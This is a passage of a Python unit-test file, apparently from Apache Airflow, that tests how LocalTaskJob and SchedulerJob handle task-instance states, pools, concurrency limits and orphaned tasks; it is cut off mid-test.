start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = "blablabla"
session.commit()
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
self.assertRaises(AirflowException, job1.heartbeat_callback)
mock_pid.return_value = 1
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.merge(ti)
session.commit()
ret = job1.heartbeat_callback()
self.assertEqual(ret, None)
mock_pid.return_value = 2
self.assertRaises(AirflowException, job1.heartbeat_callback)
@unittest.skipIf('mysql' in configuration.conf.get('core', 'sql_alchemy_conn'),
"flaky when run on mysql")
@unittest.skipIf('postgresql' in configuration.conf.get('core', 'sql_alchemy_conn'),
'flaky when run on postgresql')
def test_mark_success_no_kill(self):
"""
Test that ensures that mark_success in the UI doesn't cause
the task to fail, and that the task exits
"""
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_mark_success')
task = dag.get_task('task1')
session = settings.Session()
dag.clear()
dag.create_dagrun(run_id="test",
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = TI(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
process = multiprocessing.Process(target=job1.run)
process.start()
ti.refresh_from_db()
for i in range(0, 50):
if ti.state == State.RUNNING:
break
time.sleep(0.1)
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
ti.state = State.SUCCESS
session.merge(ti)
session.commit()
process.join(timeout=10)
self.assertFalse(process.is_alive())
ti.refresh_from_db()
self.assertEqual(State.SUCCESS, ti.state)
def test_localtaskjob_double_trigger(self):
dagbag = models.DagBag(
dag_folder=TEST_DAG_FOLDER,
include_examples=False,
)
dag = dagbag.dags.get('test_localtaskjob_double_trigger')
task = dag.get_task('test_localtaskjob_double_trigger_task')
session = settings.Session()
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=task.task_id, session=session)
ti.state = State.RUNNING
ti.hostname = get_hostname()
ti.pid = 1
session.commit()
ti_run = TI(task=task, execution_date=DEFAULT_DATE)
job1 = LocalTaskJob(task_instance=ti_run,
ignore_ti_state=True,
executor=SequentialExecutor())
with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
job1.run()
mock_method.assert_not_called()
ti = dr.get_task_instance(task_id=task.task_id, session=session)
self.assertEqual(ti.pid, 1)
self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.query(models.Pool).delete()
session.query(models.DagModel).delete()
session.query(SlaMiss).delete()
session.query(errors.ImportError).delete()
session.commit()
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag()
def getboolean(section, key):
if section.lower() == 'core' and key.lower() == 'load_examples':
return False
else:
return configuration.conf.getboolean(section, key)
cls.patcher = mock.patch('airflow.jobs.conf.getboolean')
mock_getboolean = cls.patcher.start()
mock_getboolean.side_effect = getboolean
@classmethod
def tearDownClass(cls):
cls.patcher.stop()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type dags_folder: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = [ti.key for ti in res]
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
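# Pool 'a' has a single slot, so only one of its two SCHEDULED tis is
# executable, while both tis in pool 'b' fit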
self.assertEqual(3, len(res))
res_keys = [ti.key for ti in res]
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
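# ti1 is already RUNNING, so with dag concurrency=2 only one more ti can be picked up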
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = [ti.key for ti in res]
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
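# task1 now has two RUNNING tis, which hits task_concurrency=2, so ti1_3 cannot be picked up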
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
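# Only tis whose current state is NONE or SCHEDULED are eligible, so the QUEUED ti2 is left alone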
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# It is important that len(tasks) is less than concurrency: previously,
# scheduler._execute_task_instances would only check the number of
# tasks once, so if concurrency was 3 we could execute arbitrarily
# many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# It is important that len(tasks) is less than concurrency: previously,
# scheduler._execute_task_instances would only check the number of
# tasks once, so if concurrency was 3 we could execute arbitrarily
# many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = ('dag_id', 'task_id', DEFAULT_DATE, 1)
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exit the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor()
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
